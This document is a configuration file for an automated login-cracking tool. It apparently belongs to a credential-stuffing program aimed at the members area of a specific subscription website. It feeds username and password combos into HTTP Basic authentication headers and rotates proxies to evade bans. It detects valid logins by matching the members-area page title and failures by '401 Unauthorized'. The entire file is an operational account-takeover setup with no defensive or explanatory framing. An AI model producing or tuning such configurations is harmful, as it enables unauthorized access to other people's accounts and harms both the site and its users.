[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
1708B6B35F11D2F13B727136F119BEF3=55352

[Settings]
SiteURL=http://members.sweet-regina.com/members/cms/dashboard/start
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
ComboMode=0
EmailFilter=0
EmailMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
blnNoProxies=1
HTTPHeader=GET http://members.sweet-regina.com/members/...oard/start HTTP/1.0|Accept: */*|User-Agent: <USER AGENT>|Host: members.sweet-regina.com|Pragma: no-cache|Authorization: Basic <COMBO>|
RequestMethod=1
Referer=0

[Fake]
AfterFP=1
blnSuccess=0
SuccessRetries=3
blnProcessErrors=0
Success=3
blnInvalidPath=1
blnCompleteNot=1
EnableConHits=0
ConHits=0
FollowRedirect=1
EnableConLength=0
ConLength=-1
SourceTags=1

[Keywords]
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderFail=0
EnableHeaderRetry=0
HeaderSuccess=
HeaderBan=
HeaderFail=
HeaderRetry=
EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess=<TITLE>Sweet Regina - Members Area</TITLE>
SourceBan=
SourceFail=401 Unauthorized
SourceRetry=